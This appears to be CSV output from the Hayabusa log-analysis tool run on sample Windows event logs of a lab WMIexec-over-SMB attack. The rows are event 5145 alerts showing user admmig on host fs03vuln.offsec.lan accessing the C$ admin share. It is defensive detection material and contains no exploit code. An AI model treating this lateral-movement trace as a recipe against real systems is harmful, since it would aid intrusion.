10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168#\9d5a241e9cf3bdb8312058004ea269f4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\68828aa1ea98316a22a4d8488267b07b : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mff1be75b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mff1be75b#\7cb1fc2895121ae7e24841bd0c24b25e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P0e11b656# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P0e11b656#\e1349161320cee221fb339c41ab73546 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f9a5e83# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f9a5e83#\59420f153f7bb0ef6f63e75d08020c8c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\433ad5082c48708eb6acf6fa065c1461 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5#\87b325b56b362a5d2dca93029c0d75b8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P9de5a786# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P9de5a786#\8078dc8e65f16bfd95c09cce4fe0280e : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P10d01611# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P10d01611#\54330dabd4f5e29c758461cbbf2a4f34 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1#\50399e243bf8da1addc23305521efbd9 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe#\174cd66357bfa0b262b0dbd9bd0e64e3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P047767ce# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P047767ce#\f05e09fe4c0d9354867afe11b4e9db8c : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.811 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\89e812888a4e94f1d2bf0da1c4c6ee5b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P655586bb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P655586bb#\f3228ac51b37737ae2ce1176bbbad2ce : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136#\cabc62ca2a04f99fe9af65799a727687 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\1617c5f47d154a5d7cf1f53851398006 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\19b334bb62b3c76cfcc7137bb03371c3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pcd26229b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pcd26229b#\822ee6a8aa9386352052b7bd2610f3b5 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pd3efef62# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pd3efef62#\ab00f4aa6892c4c6d39b87f078e8208f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pefb7a36b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pefb7a36b#\93b57911ae369118b40a5605c448eb9d : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.R251a4777# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.R251a4777#\b090c87f42b1af785a6a9d1c43c201c6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S0f8e494c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S0f8e494c#\c59f97903ad4de423586f3a75eb8939d : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S1bc92e04# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S1bc92e04#\f6f9e39cc765b7ceda89fc7893e0f74c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S8ca2c749# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S8ca2c749#\7ddbc8b883fb594b4efd9f4b016a4657 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S54faafb0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S54faafb0#\54486a01e573ae88df2c9fc21771e5ef : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S356e1ba0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S356e1ba0#\29e4fb69d6e2ff119c3e89fe9f23ea71 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S88747207# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S88747207#\e998cb40c6a3657a6090a653616ee0d2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sa56e3556# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sa56e3556#\2da102d7caf13b4e082aabda839cabfd : IP Address: 
